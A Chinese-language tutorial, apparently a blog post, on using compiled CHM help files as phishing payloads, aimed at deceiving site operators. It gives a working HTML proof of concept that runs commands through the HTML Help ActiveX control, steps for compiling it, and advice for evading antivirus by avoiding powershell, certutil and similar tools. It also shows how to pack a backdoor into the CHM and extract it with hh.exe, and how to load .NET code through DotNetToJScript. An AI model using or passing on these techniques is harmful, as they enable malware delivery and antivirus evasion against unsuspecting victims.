1、CHM钓鱼

进行钓鱼选择合适的payload非常重要，使用一些容易让人放松警惕的文件格式可以大大提高钓鱼的成功率。CHM是微软推出的基于HTML的帮助文件系统，被 IE 浏览器支持的JavaScript, VBScript, ActiveX,等，CHM同样支持。因此使用CHM作为钓鱼的payload非常合适。

上述的总体意思就是，可以让更多站长上当，这里充分了利用到了社会工程学

1） 、使用com控件命令执行

根据@ithurricanept的推特

使用了js启动com控件执行命令

原始码如下：

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>

POC

使用HTML帮助研讨会

创建一个新的项目，添加文件后进行编译

选择新

记住这里千万不要打勾

随便输入记住带.hpp后缀

随便选择一个

然后选择new之后选择HTML文件

然后输入我们刚才的poc

写完之后ctrl + s保存

记住保存的地址

然后点击这个

选择添加把我们刚写的文件添加进去

然后点击ok

随后点击这个

得到地址去访问。发现便执行了命令

利用

实际测试的时候注意了以下几点：

执行命令的时候注意预定的参数与程序名需要用逗号替换，参数与参数之间不需要。

考虑到进行敏感操作会导致杀软提示，因此应避免使用powershell，bitsadmin，certutil，cscript等。

通过cmd执行命令也属于敏感操作，因此使用多个控件依次执行命令。

在搜索的过程中发现.chm文件的替换程序hh.exe具有反编译功能（反编译，将chm返回成html，其实就类似chm可以比喻成一个压缩包，decompile是解压缩）的功能，可以将打包进chm的文件释放出来

HH.EXE -decompile D:/xTemp/decompile-folder C:/xTemp/XMLconvert.chm

hh -decompile目标文件夹源CHM文件名

这句话的意思

因此可以将后门程序一起打包进chm文件中，运行时调用hh.exe释放chm中的后门程序再执行。

测试：

使用360测试的时候效果不太理想，在联网情况下使用hh.exe反编译会被拦截，断网情况下没有问题。

使用火绒测试没有任何拦截。

3、使用js加载.net

既然可以利用chm执行js，那为什么不内嵌.net和dll呢？

POC

编写一个.net dll

namespace ClassLibrary1{    public class Class1    {        public Class1()        {            /* Start notepad */			Process.Start("notepad.exe");        }    }}

生成js脚本

DotNetToJScript.exe -o 1.js ClassLibrary1.dll -c ClassLibrary1.Class1